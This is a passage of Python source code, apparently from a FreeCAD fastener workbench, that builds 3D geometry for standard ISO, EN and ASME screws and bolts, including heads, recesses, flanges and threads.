edgeB1 = Part.makeLine(Pnt7, PntB1)
aWire = Part.Wire([edge2, edge3, edge4, edge5, edgeB1, edgeB2])
hWire = Part.Wire([edge1, edgeH1, edgeH2, edgeH3]) # Cutter for recess-Shell
hFace = Part.Face(hWire)
hCut = hFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(hWire)
headShell = aWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# head = Part.Solid(headShell)
# Part.show(aWire)
# FreeCAD.Console.PrintMessage("the head with revolve: " + str(dia) + "\n")
headFaces = headShell.Faces
if SType == 'ISO14583':
recess, recessShell = self.makeIso10664_3(tt, t_mean, k)
recessShell = recessShell.cut(hCut)
topFace = hCut.Faces[1]
topFace = topFace.cut(recess)
# Part.show(topFace)
# Part.show(recessShell)
# Part.show(headShell)
headFaces.append(topFace.Faces[0])
# headFaces.append(hCut.Faces[2])
else:
# Lengths and angles for calculation of recess positioning
beta_cr = math.asin(mH / 2.0 / rf) # angle of recess edge
tan_beta_cr = math.tan(beta_cr)
# height of cross recess cutting
hcr = k - rf + (mH / 2.0) / tan_beta_cr
# print 'hcr: ', hcr
# Parameter for cross-recess type H: cT, mH
recess, recessShell = self.makeCross_H3(cT, mH, hcr)
recessShell = recessShell.cut(hCut)
topFace = hCut.Faces[0]
topFace = topFace.cut(recess)
# Part.show(topFace)
# Part.show(recessShell)
# Part.show(headShell)
headFaces.append(topFace.Faces[0])
# Part.show(hCut)
headFaces.extend(recessShell.Faces)
# if self.RealThread.isChecked():
if self.rThread:
# head = self.cutIsoThread(head, dia, P, turns, l)
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
# head = head.fuse(rthread)
# Part.show(rthread)
for threadFace in rthread.Faces:
headFaces.append(threadFace)
newHeadShell = Part.Shell(headFaces)
# Part.show(newHeadShell)
head = Part.Solid(newHeadShell)
return head
# make Cheese head screw
# ISO 1207 slotted screw
# ISO 7048 cross recessed screw
# ISO 14580 Hexalobular socket cheese head screws
def makeIso1207(self, SType='ISO1207', ThreadType='M6', l=25.0):
dia = self.getDia(ThreadType, False)
'''
if '(' in TreadType:
threadString = ThreadType.lstrip('(M')
dia = float(ThreadType.rstrip(')'))
else:
dia=float(ThreadType.lstrip('M'))
'''
# FreeCAD.Console.PrintMessage("the head with l: " + str(l) + "\n")
if SType == 'ISO1207' or SType == 'ISO14580':
P, a, b, dk, dk_mean, da, k, n_min, r, t_min, x = FsData["iso1207def"][ThreadType]
if SType == 'ISO7048':
P, a, b, dk, dk_mean, da, k, r, x, cT, mH, mZ = FsData["iso7048def"][ThreadType]
if SType == 'ISO14580':
tt, k, A, t_min = FsData["iso14580def"][ThreadType]
# FreeCAD.Console.PrintMessage("the head with iso: " + str(dk) + "\n")
# Length for calculation of head fillet
r_fil = r * 2.0
beta = math.radians(5.0) # angle of cheese head edge
alpha = math.radians(90.0 - (90.0 + 5.0) / 2.0)
tan_beta = math.tan(beta)
# top head diameter without fillet
rK_top = dk / 2.0 - k * tan_beta
fillet_center_x = rK_top - r_fil + r_fil * tan_beta
fillet_center_z = k - r_fil
fillet_arc_x = fillet_center_x + r_fil * math.sin(alpha)
fillet_arc_z = fillet_center_z + r_fil * math.cos(alpha)
# FreeCAD.Console.PrintMessage("rK_top: " + str(rK_top) + "\n")
if b > l - 1.0 * P:
bmax = l - 1.0 * P
else:
bmax = b
### make the new code with math.modf(l)
residue, turns = math.modf(bmax / P)
halfturns = 2 * int(turns)
if residue < 0.5:
a_point = l - (turns + 1.0) * P
halfturns = halfturns + 1
else:
halfturns = halfturns + 2
a_point = l - (turns + 2.0) * P
# halfturns = halfturns + 2
offSet = r - a_point
sqrt2_ = 1.0 / math.sqrt(2.0)
# Head Points
Pnt2 = Base.Vector(fillet_center_x, 0.0, k)
Pnt3 = Base.Vector(fillet_arc_x, 0.0, fillet_arc_z)
Pnt4 = Base.Vector(fillet_center_x + r_fil * math.cos(beta), 0.0, fillet_center_z + r_fil * math.sin(beta))
Pnt5 = Base.Vector(dk / 2.0, 0.0, 0.0)
Pnt6 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
Pnt7 = Base.Vector(dia / 2.0 + r - r * sqrt2_, 0.0, -r + r * sqrt2_) # arc-point of fillet
Pnt8 = Base.Vector(dia / 2.0, 0.0, -r) # end of fillet
Pnt9 = Base.Vector(dia / 2.0, 0.0, -a_point) # Start of thread
# FreeCAD.Console.PrintMessage("Points defined fillet_center_x: " + str(fillet_center_x) + "\n")
if SType == 'ISO14580':
# Pnt0 = Base.Vector(0.0,0.0,k-A/4.0) #Center Point for countersunk
Pnt0 = Base.Vector(0.0, 0.0, k - A / 8.0) # Center Point for flat countersunk
PntFlat = Base.Vector(A / 8.0, 0.0, k - A / 8.0) # End of flat part
Pnt1 = Base.Vector(A / 1.99, 0.0, k) # countersunk edge at head
edgeCham0 = Part.makeLine(Pnt0, PntFlat)
edgeCham1 = Part.makeLine(PntFlat, Pnt1)
edgeCham2 = Part.makeLine(Pnt1, Pnt2)
edge1 = Part.Wire([edgeCham1, edgeCham2]) # make head with countersunk
PntH1 = Base.Vector(A / 1.99, 0.0, 2.0 * k)
else:
Pnt0 = Base.Vector(0.0, 0.0, k)
edge1 = Part.makeLine(Pnt0, Pnt2) # make flat head
edge2 = Part.Arc(Pnt2, Pnt3, Pnt4).toShape()
edge3 = Part.makeLine(Pnt4, Pnt5)
edge4 = Part.makeLine(Pnt5, Pnt6)
edge5 = Part.Arc(Pnt6, Pnt7, Pnt8).toShape()
# FreeCAD.Console.PrintMessage("Edges made fillet_center_z: " + str(fillet_center_z) + "\n")
if SType == 'ISO1207':
# Parameter for slot-recess: dk, n_min, k, t_min
recess = Part.makePlane(dk, n_min, \
Base.Vector(dk / 2.0, -n_min / 2.0, k + 1.0), Base.Vector(0.0, 0.0, -1.0))
recess = recess.extrude(Base.Vector(0.0, 0.0, -t_min - 1.0))
if self.rThread:
Pnt11 = Base.Vector(0.0, 0.0, -r) # helper point for real thread
edgeZ1 = Part.makeLine(Pnt8, Pnt11)
edgeZ0 = Part.makeLine(Pnt11, Pnt0)
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5, \
edgeZ1, edgeZ0])
else:
# bolt points
PntB1 = Base.Vector(dia / 2.0, 0.0, -l)
PntB2 = Base.Vector(0.0, 0.0, -l)
edgeB2 = Part.makeLine(PntB1, PntB2)
if a_point <= r:
edgeB1 = Part.makeLine(Pnt8, PntB1)
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5, \
edgeB1, edgeB2])
else:
edge6 = Part.makeLine(Pnt8, Pnt9)
edgeB1 = Part.makeLine(Pnt9, PntB1)
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5, edge6, \
edgeB1, edgeB2])
aFace = Part.Face(aWire)
head = aFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360.0)
head = head.cut(recess)
# FreeCAD.Console.PrintMessage("the head cut: " + str(dia) + "\n")
# Part.show(head)
if self.rThread:
screwFaces = []
for i in range(0, len(head.Faces) - 1):
screwFaces.append(head.Faces[i])
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
for threadFace in rthread.Faces:
screwFaces.append(threadFace)
screwShell = Part.Shell(screwFaces)
head = Part.Solid(screwShell)
else:
if self.rThread:
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5])
else:
# bolt points
PntB1 = Base.Vector(dia / 2.0, 0.0, -l)
PntB2 = Base.Vector(0.0, 0.0, -l)
edgeB2 = Part.makeLine(PntB1, PntB2)
if a_point <= r:
edgeB1 = Part.makeLine(Pnt8, PntB1)
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5, \
edgeB1, edgeB2])
else:
edge6 = Part.makeLine(Pnt8, Pnt9)
edgeB1 = Part.makeLine(Pnt9, PntB1)
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5, edge6, \
edgeB1, edgeB2])
# aFace =Part.Face(aWire)
headShell = aWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360.0)
# FreeCAD.Console.PrintMessage("the head with revolve: " + str(dia) + "\n")
if SType == 'ISO7048':
# hCut should be just a cylinder
hCut = Part.makeCylinder(fillet_center_x, k, Pnt0)
recess, recessShell = self.makeCross_H3(cT, mH, k)
recessShell = recessShell.cut(hCut)
topFace = headShell.Faces[0].cut(recess)
screwFaces = [topFace.Faces[0]]
screwFaces.extend(recessShell.Faces)
if SType == 'ISO14580':
# Ring-cutter for recess shell
PntH2 = Base.Vector(A / 8.0, 0.0, 2.0 * k)
edgeH1 = Part.makeLine(Pnt1, PntH1)
edgeH2 = Part.makeLine(PntH1, PntH2)
edgeH3 = Part.makeLine(PntH2, PntFlat)
hWire = Part.Wire([edgeCham1, edgeH1, edgeH2, edgeH3]) # Cutter for recess-Shell
hFace = Part.Face(hWire)
hCut = hFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(hWire)
recess, recessShell = self.makeIso10664_3(tt, t_min, k)
recessShell = recessShell.cut(hCut)
topFace = headShell.Faces[0].cut(recess)
screwFaces = [topFace.Faces[0]]
screwFaces.extend(recessShell.Faces)
for i in range(1, len(headShell.Faces)):
screwFaces.append(headShell.Faces[i])
if self.rThread:
# head = self.cutIsoThread(head, dia, P, turns, l)
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
# head = head.fuse(rthread)
# Part.show(rthread)
for threadFace in rthread.Faces:
screwFaces.append(threadFace)
screwShell = Part.Shell(screwFaces)
head = Part.Solid(screwShell)
return head
# make the ISO 4017 Hex-head-screw
# make the ISO 4014 Hex-head-bolt
def makeIso4017_2(self, SType, ThreadType, l=40.0):
dia = self.getDia(ThreadType, False)
# FreeCAD.Console.PrintMessage("the head with l: " + str(l) + "\n")
if SType == 'ISO4017':
P, c, dw, e, k, r, s = FsData["iso4017head"][ThreadType]
### make the new code with math.modf(l)
residue, turns = math.modf((l - 1 * P) / P)
halfturns = 2 * int(turns)
if SType == 'ISO4014':
P, b1, b2, b3, c, dw, e, k, r, s = FsData["iso4014head"][ThreadType]
if l <= 125.0:
b = b1
else:
if l <= 200.0:
b = b2
else:
b = b3
### make the new code with math.modf(l)
residue, turns = math.modf(b / P)
halfturns = 2 * int(turns)
if SType == 'ASMEB18.2.1.6':
b, P, c, dw, e, k, r, s = FsData["asmeb18.2.1.6def"][ThreadType]
if l > 6 * 25.4:
b += 6.35
### make the new code with math.modf(l)
residue, turns = math.modf((b) / P)
halfturns = 2 * int(turns)
if residue < 0.5:
a = l - (turns + 1.0) * P
halfturns = halfturns + 1
else:
halfturns = halfturns + 2
a = l - (turns + 2.0) * P
# halfturns = halfturns + 2
offSet = r - a
sqrt2_ = 1.0 / math.sqrt(2.0)
cham = (e - s) * math.sin(math.radians(15)) # needed for chamfer at head top
# Head Points Usage of k, s, cham, c, dw, dia, r, a
# FreeCAD.Console.PrintMessage("the head with halfturns: " + str(halfturns) + "\n")
Pnt0 = Base.Vector(0.0, 0.0, k)
Pnt2 = Base.Vector(s / 2.0, 0.0, k)
Pnt3 = Base.Vector(s / math.sqrt(3.0), 0.0, k - cham)
Pnt4 = Base.Vector(s / math.sqrt(3.0), 0.0, c)
Pnt5 = Base.Vector(dw / 2.0, 0.0, c)
Pnt6 = Base.Vector(dw / 2.0, 0.0, 0.0)
Pnt7 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
Pnt8 = Base.Vector(dia / 2.0 + r - r * sqrt2_, 0.0, -r + r * sqrt2_) # arc-point of fillet
Pnt9 = Base.Vector(dia / 2.0, 0.0, -r) # end of fillet
Pnt10 = Base.Vector(dia / 2.0, 0.0, -a) # Start of thread
edge1 = Part.makeLine(Pnt0, Pnt2)
edge2 = Part.makeLine(Pnt2, Pnt3)
edge3 = Part.makeLine(Pnt3, Pnt4)
edge4 = Part.makeLine(Pnt4, Pnt5)
edge5 = Part.makeLine(Pnt5, Pnt6)
edge6 = Part.makeLine(Pnt6, Pnt7)
edge7 = Part.Arc(Pnt7, Pnt8, Pnt9).toShape()
# create cutting tool for hexagon head
# Parameters s, k, outer circle diameter = e/2.0+10.0
extrude = self.makeHextool(s, k, s * 2.0)
# if self.RealThread.isChecked():
if self.rThread:
Pnt11 = Base.Vector(0.0, 0.0, -r) # helper point for real thread
edgeZ1 = Part.makeLine(Pnt9, Pnt11)
edgeZ0 = Part.makeLine(Pnt11, Pnt0)
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5, edge6, edge7, \
edgeZ1, edgeZ0])
aFace = Part.Face(aWire)
head = aFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360.0)
# FreeCAD.Console.PrintMessage("the head with revolve: " + str(dia) + "\n")
# Part.show(extrude)
head = head.cut(extrude)
# FreeCAD.Console.PrintMessage("the head cut: " + str(dia) + "\n")
# Part.show(head)
headFaces = []
for i in range(18):
headFaces.append(head.Faces[i])
if dia < 3.0 or dia > 5.0:
rthread = self.makeShellthread(dia, P, halfturns, True, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a - 2.0 * P))
# rthread.translate(Base.Vector(0.0, 0.0,-2.0*P))
# Part.show(rthread)
for tFace in rthread.Faces:
headFaces.append(tFace)
headShell = Part.Shell(headFaces)
head = Part.Solid(headShell)
else:
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a - 2.0 * P))
# rthread.translate(Base.Vector(0.0, 0.0,-2.0*P))
# Part.show(rthread)
for tFace in rthread.Faces:
headFaces.append(tFace)
headShell = Part.Shell(headFaces)
head = Part.Solid(headShell)
cyl = self.cutChamfer(dia, P, l)
# FreeCAD.Console.PrintMessage("before the end of the cut: " + str(dia) + "\n")
head = head.cut(cyl)
else:
# bolt points
cham_t = P * math.sqrt(3.0) / 2.0 * 17.0 / 24.0
PntB0 = Base.Vector(0.0, 0.0, -a)
PntB1 = Base.Vector(dia / 2.0, 0.0, -l + cham_t)
PntB2 = Base.Vector(dia / 2.0 - cham_t, 0.0, -l)
PntB3 = Base.Vector(0.0, 0.0, -l)
edgeB1 = Part.makeLine(Pnt10, PntB1)
edgeB2 = Part.makeLine(PntB1, PntB2)
edgeB3 = Part.makeLine(PntB2, PntB3)
edgeZ0 = Part.makeLine(PntB3, Pnt0)
if a <= r:
edgeB1 = Part.makeLine(Pnt9, PntB1)
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5, edge6, edge7, \
edgeB1, edgeB2, edgeB3, edgeZ0])
else:
edge8 = Part.makeLine(Pnt9, Pnt10)
edgeB1 = Part.makeLine(Pnt10, PntB1)
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5, edge6, edge7, edge8, \
edgeB1, edgeB2, edgeB3, edgeZ0])
aFace = Part.Face(aWire)
head = aFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360.0)
# FreeCAD.Console.PrintMessage("the head with revolve: " + str(dia) + "\n")
# Part.show(extrude)
head = head.cut(extrude)
# FreeCAD.Console.PrintMessage("the head cut: " + str(dia) + "\n")
return head
# EN 1662 Hex-head-bolt with flange - small series
# EN 1665 Hexagon bolts with flange, heavy series
def makeEN1662_2(self, SType='EN1662', ThreadType='M8', l=25.0):
dia = self.getDia(ThreadType, False)
# FreeCAD.Console.PrintMessage("the head with l: " + str(l) + "\n")
if SType == 'EN1662':
P, b0, b1, b2, b3, c, dc, dw, e, k, kw, f, r1, s = FsData["en1662def"][ThreadType]
elif SType == 'EN1665':
P, b0, b1, b2, b3, c, dc, dw, e, k, kw, f, r1, s = FsData["en1665def"][ThreadType]
elif SType == 'ASMEB18.2.1.8':
b0, P, c, dc, kw, r1, s = FsData["asmeb18.2.1.8def"][ThreadType]
b = b0
if l < b0:
b = l - 2 * P
elif SType != 'ASMEB18.2.1.8':
if l <= 125.0:
b = b1
else:
if l <= 200.0:
b = b2
else:
b = b3
# FreeCAD.Console.PrintMessage("the head with isoEN1662: " + str(c) + "\n")
cham = s * (2.0 / math.sqrt(3.0) - 1.0) * math.sin(math.radians(25)) # needed for chamfer at head top
### make the new code with math.modf(l)
residue, turns = math.modf(b / P)
halfturns = 2 * int(turns)
if residue < 0.5:
a_point = l - (turns + 1.0) * P
halfturns = halfturns + 1
else:
halfturns = halfturns + 2
a_point = l - (turns + 2.0) * P
# halfturns = halfturns + 2
offSet = r1 - a_point
sqrt2_ = 1.0 / math.sqrt(2.0)
# Flange is made with a radius of c
beta = math.radians(25.0)
tan_beta = math.tan(beta)
# Calculation of Arc points of flange edge using dc and c
arc1_x = dc / 2.0 - c / 2.0 + (c / 2.0) * math.sin(beta)
arc1_z = c / 2.0 + (c / 2.0) * math.cos(beta)
hF = arc1_z + (arc1_x - s / 2.0) * tan_beta # height of flange at center
kmean = arc1_z + (arc1_x - s / math.sqrt(3.0)) * tan_beta + kw * 1.1 + cham
# kmean = k * 0.95
# Hex-Head Points
# FreeCAD.Console.PrintMessage("the head with math a: " + str(a_point) + "\n")
PntH0 = Base.Vector(0.0, 0.0, kmean * 0.9)
PntH1 = Base.Vector(s / 2.0 * 0.8 - r1 / 2.0, 0.0, kmean * 0.9)
PntH1a = Base.Vector(s / 2.0 * 0.8 - r1 / 2.0 + r1 / 2.0 * sqrt2_, 0.0,
kmean * 0.9 + r1 / 2.0 - r1 / 2.0 * sqrt2_)
PntH1b = Base.Vector(s / 2.0 * 0.8, 0.0, kmean * 0.9 + r1 / 2.0)
PntH2 = Base.Vector(s / 2.0 * 0.8, 0.0, kmean - r1)
PntH2a = Base.Vector(s / 2.0 * 0.8 + r1 - r1 * sqrt2_, 0.0, kmean - r1 + r1 * sqrt2_)
PntH2b = Base.Vector(s / 2.0 * 0.8 + r1, 0.0, kmean)
PntH3 = Base.Vector(s / 2.0, 0.0, kmean)
# PntH4 = Base.Vector(s/math.sqrt(3.0),0.0,kmean-cham) #s/math.sqrt(3.0)
# PntH5 = Base.Vector(s/math.sqrt(3.0),0.0,c)
# PntH6 = Base.Vector(0.0,0.0,c)
edgeH1 = Part.makeLine(PntH0, PntH1)
edgeH2 = Part.Arc(PntH1, PntH1a, PntH1b).toShape()
edgeH3 = Part.makeLine(PntH1b, PntH2)
edgeH3a = Part.Arc(PntH2, PntH2a, PntH2b).toShape()
edgeH3b = Part.makeLine(PntH2b, PntH3)
hWire = Part.Wire([edgeH1, edgeH2, edgeH3, edgeH3a, edgeH3b])
topShell = hWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(hWire)
# Part.show(topShell)
# create a cutter ring to generate the chamfer at the top of the hex
chamHori = s / math.sqrt(3.0) - s / 2.0
PntC1 = Base.Vector(s / 2.0 - chamHori, 0.0, kmean + kmean)
PntC2 = Base.Vector(s / math.sqrt(3.0) + chamHori, 0.0, kmean + kmean)
PntC3 = Base.Vector(s / 2.0 - chamHori, 0.0, kmean + cham)
PntC4 = Base.Vector(s / math.sqrt(3.0) + chamHori, 0.0, kmean - cham - cham) # s/math.sqrt(3.0)
edgeC1 = Part.makeLine(PntC3, PntC1)
edgeC2 = Part.makeLine(PntC1, PntC2)
edgeC3 = Part.makeLine(PntC2, PntC4)
edgeC4 = Part.makeLine(PntC4, PntC3)
cWire = Part.Wire([edgeC4, edgeC1, edgeC2, edgeC3])
cFace = Part.Face(cWire)
chamCut = cFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(cWire)
# Part.show(chamCut)
# create hexagon
mhex = Base.Matrix()
mhex.rotateZ(math.radians(60.0))
polygon = []
vhex = Base.Vector(s / math.sqrt(3.0), 0.0, kmean)
for i in range(6):
polygon.append(vhex)
vhex = mhex.multiply(vhex)
polygon.append(vhex)
hexagon = Part.makePolygon(polygon)
hexFace = Part.Face(hexagon)
solidHex = hexFace.extrude(Base.Vector(0.0, 0.0, c - kmean))
# Part.show(solidHex)
hexCham = solidHex.cut(chamCut)
# Part.show(hexCham)
topFaces = topShell.Faces
topFaces.append(hexCham.Faces[6])
topFaces.append(hexCham.Faces[12])
topFaces.append(hexCham.Faces[14])
topFaces.append(hexCham.Faces[13])
topFaces.append(hexCham.Faces[8])
topFaces.append(hexCham.Faces[2])
topFaces.append(hexCham.Faces[1])
hexFaces = [hexCham.Faces[5], hexCham.Faces[11], hexCham.Faces[10]]
hexFaces.extend([hexCham.Faces[9], hexCham.Faces[3], hexCham.Faces[0]])
hexShell = Part.Shell(hexFaces)
# Center of flange:
Pnt0 = Base.Vector(0.0, 0.0, hF)
Pnt1 = Base.Vector(s / 2.0, 0.0, hF)
# arc edge of flange:
Pnt2 = Base.Vector(arc1_x, 0.0, arc1_z)
Pnt3 = Base.Vector(dc / 2.0, 0.0, c / 2.0)
Pnt4 = Base.Vector((dc - c) / 2.0, 0.0, 0.0)
Pnt5 = Base.Vector(dia / 2.0 + r1, 0.0, 0.0) # start of fillet between head and shank
Pnt6 = Base.Vector(dia / 2.0 + r1 - r1 * sqrt2_, 0.0, -r1 + r1 * sqrt2_) # arc-point of fillet
Pnt7 = Base.Vector(dia / 2.0, 0.0, -r1) # end of fillet
Pnt8 = Base.Vector(dia / 2.0, 0.0, -a_point) # Start of thread
edge1 = Part.makeLine(Pnt0, Pnt1)
edge2 = Part.makeLine(Pnt1, Pnt2)
edge3 = Part.Arc(Pnt2, Pnt3, Pnt4).toShape()
edge4 = Part.makeLine(Pnt4, Pnt5)
edge5 = Part.Arc(Pnt5, Pnt6, Pnt7).toShape()
# make a cutter for the hexShell
PntHC1 = Base.Vector(0.0, 0.0, arc1_z)
PntHC2 = Base.Vector(0.0, 0.0, 0.0)
edgeHC1 = Part.makeLine(Pnt2, PntHC1)
edgeHC2 = Part.makeLine(PntHC1, PntHC2)
edgeHC3 = Part.makeLine(PntHC2, Pnt0)
HCWire = Part.Wire([edge2, edgeHC1, edgeHC2, edgeHC3, edge1])
HCFace = Part.Face(HCWire)
hex2Cut = HCFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
hexShell = hexShell.cut(hex2Cut)
# Part.show(hexShell)
topFaces.extend(hexShell.Faces)
# bolt points
cham_t = P * math.sqrt(3.0) / 2.0 * 17.0 / 24.0
PntB0 = Base.Vector(0.0, 0.0, -a_point)
PntB1 = Base.Vector(dia / 2.0, 0.0, -l + cham_t)
PntB2 = Base.Vector(dia / 2.0 - cham_t, 0.0, -l)
PntB3 = Base.Vector(0.0, 0.0, -l)
edgeB2 = Part.makeLine(PntB1, PntB2)
edgeB3 = Part.makeLine(PntB2, PntB3)
# if self.RealThread.isChecked():
if self.rThread:
aWire = Part.Wire([edge2, edge3, edge4, edge5])
boltIndex = 4
else:
if a_point <= r1:
edgeB1 = Part.makeLine(Pnt7, PntB1)
aWire = Part.Wire([edge2, edge3, edge4, edge5, edgeB1, edgeB2, edgeB3])
boltIndex = 7
else:
edgeB1 = Part.makeLine(Pnt8, PntB1)
edge6 = Part.makeLine(Pnt7, Pnt8)
aWire = Part.Wire([edge2, edge3, edge4, edge5, edge6, \
edgeB1, edgeB2, edgeB3])
boltIndex = 8
# aFace =Part.Face(aWire)
# Part.show(aWire)
headShell = aWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# FreeCAD.Console.PrintMessage("the head with revolve: " + str(dia) + "\n")
# Part.show(headShell)
chamFace = headShell.Faces[0].cut(solidHex)
# Part.show(chamFace)
topFaces.append(chamFace.Faces[0])
for i in range(1, boltIndex):
topFaces.append(headShell.Faces[i])
if self.rThread:
if dia < 3.0 or dia > 5.0:
rthread = self.makeShellthread(dia, P, halfturns, True, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
for tFace in rthread.Faces:
topFaces.append(tFace)
headShell = Part.Shell(topFaces)
screw = Part.Solid(headShell)
else:
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
for tFace in rthread.Faces:
topFaces.append(tFace)
headShell = Part.Shell(topFaces)
head = Part.Solid(headShell)
cyl = self.cutChamfer(dia, P, l)
# FreeCAD.Console.PrintMessage("before the end of the cut: " + str(dia) + "\n")
screw = head.cut(cyl)
else:
screwShell = Part.Shell(topFaces)
screw = Part.Solid(screwShell)
return screw
# also used for ISO 7046 countersunk flat head screws with H cross recess
# also used for ISO 7047 raised countersunk head screws with H cross recess
# also used for ISO 10642 Hexagon socket countersunk head screws
# also used for ISO 14582 Hexalobular socket countersunk head screws, high head
# also used for ISO 14584 Hexalobular socket raised countersunk head screws
def makeIso7046(self, SType='ISO7046', ThreadType='M6', l=25.0):
dia = self.getDia(ThreadType, False)
# FreeCAD.Console.PrintMessage("der 2009Kopf mit l: " + str(l) + "\n")
if SType == 'ISO10642':
P, b, dk_theo, dk_mean, da, ds_min, e, k, r, s_mean, t, w = FsData["iso10642def"][ThreadType]
ePrax = s_mean / math.sqrt(3.0) / 0.99
ht = 0.0
a = 2 * P
t_mean = t
elif SType == 'ASMEB18.3.2':
P, b, dk_theo, dk_mean, k, r, s_mean, t = FsData["asmeb18.3.2def"][ThreadType]
ePrax = s_mean / math.sqrt(3.0) / 0.99
ht = 0.0
a = 2 * P
t_mean = t
else: # still need the data from iso2009def, but this screw can not created here
P, a, b, dk_theo, dk_mean, k, n_min, r, t_mean, x = FsData["iso2009def"][ThreadType]
ht = 0.0 # Head height of flat head
if SType == 'ISO7046':
cT, mH, mZ = FsData["iso7046def"][ThreadType]
if SType == 'ISO7047':
rf, t_mean, cT, mH, mZ = FsData["Raised_countersunk_def"][ThreadType]
# Lengths and angles for calculation of head rounding
beta = math.asin(dk_mean / 2.0 / rf) # angle of head edge
tan_beta = math.tan(beta)
alpha = beta / 2.0 # half angle
# height of raised head top
ht = rf - (dk_mean / 2.0) / tan_beta
# print 'he: ', he
h_arc_x = rf * math.sin(alpha)
h_arc_z = ht - rf + rf * math.cos(alpha)
# FreeCAD.Console.PrintMessage("h_arc_z: " + str(h_arc_z) + "\n")
if SType == 'ISO14582':
P, a, b, dk_theo, dk_mean, k, r, tt, A, t_mean = FsData["iso14582def"][ThreadType]
ePrax = A / 2.0 / 0.99
if SType == 'ISO14584':
P, b, dk_theo, dk_mean, f, k, r, rf, x, tt, A, t_mean = FsData["iso14584def"][ThreadType]
ePrax = A / 2.0 / 0.99
# Lengths and angles for calculation of head rounding
beta = math.asin(dk_mean / 2.0 / rf) # angle of head edge
tan_beta = math.tan(beta)
ctp = - (dk_mean / 2.0) / tan_beta # Center Top Edge = center for rf
betaA = math.asin(ePrax / rf) # angle of head edge at start of recess
ht = ctp + ePrax / math.tan(betaA)
alpha = betaA + (beta - betaA) / 2.0 # half angle of top Arc
h_arc_x = rf * math.sin(alpha)
h_arc_z = ctp + rf * math.cos(alpha)
# FreeCAD.Console.PrintMessage("the head with iso r: " + str(r) + "\n")
cham = (dk_theo - dk_mean) / 2.0
rad225 = math.radians(22.5)
rad45 = math.radians(45.0)
rtan = r * math.tan(rad225)
# FreeCAD.Console.PrintMessage("Checking rtan: " + str(rtan) + "\n")
if b > (l - k - rtan / 2.0 - 1.0 * P):
bmax = l - k - rtan / 2.0 - 1.0 * P
else:
bmax = b
### make the new code with math.modf(l)
residue, turns = math.modf((bmax) / P)
halfturns = 2 * int(turns)
if residue < 0.5:
a_point = l - (turns + 1.0) * P
halfturns = halfturns + 1
else:
halfturns = halfturns + 2
a_point = l - (turns + 2.0) * P
# halfturns = halfturns + 2
offSet = k + rtan - a_point
# Head Points
Pnt1 = Base.Vector(dk_mean / 2.0, 0.0, 0.0)
Pnt2 = Base.Vector(dk_mean / 2.0, 0.0, -cham)
Pnt3 = Base.Vector(dia / 2.0 + r - r * math.cos(rad45), 0.0, -k - rtan + r * math.sin(rad45))
# Arc-points
Pnt4 = Base.Vector(dia / 2.0 + r - r * (math.cos(rad225)), 0.0, -k - rtan + r * math.sin(rad225))
Pnt5 = Base.Vector(dia / 2.0, 0.0, -k - rtan)
Pnt6 = Base.Vector(dia / 2.0, 0.0, -a_point)
if SType == 'ISO10642' or SType == 'ISO14582' or SType == 'ASMEB18.3.2':
if SType == 'ISO10642' or SType == 'ASMEB18.3.2':
recess, recessShell = self.makeAllen2(s_mean, t_mean, 0.0)
Pnt0 = Base.Vector(ePrax / 2.0, 0.0, -ePrax / 2.0)
PntCham = Base.Vector(ePrax, 0.0, 0.0)
edge1 = Part.makeLine(Pnt0, PntCham)
edgeCham2 = Part.makeLine(PntCham, Pnt1)
edge2 = Part.makeLine(Pnt1, Pnt2)
edge2 = Part.Wire([edgeCham2, edge2])
PntH0 = Base.Vector(ePrax / 2.0, 0.0, ht + k)
PntH1 = Base.Vector(ePrax, 0.0, ht + k)
if SType == 'ISO14582':
recess, recessShell = self.makeIso10664_3(tt, t_mean, 0.0) # hexalobular recess
Pnt0 = Base.Vector(0.0, 0.0, 0.0)
edge1 = Part.makeLine(Pnt0, Pnt1)
edge2 = Part.makeLine(Pnt1, Pnt2)
# bolt points with bolt chamfer
cham_b = P * math.sqrt(3.0) / 2.0 * 17.0 / 24.0
PntB1 = Base.Vector(dia / 2.0, 0.0, -l + cham_b)
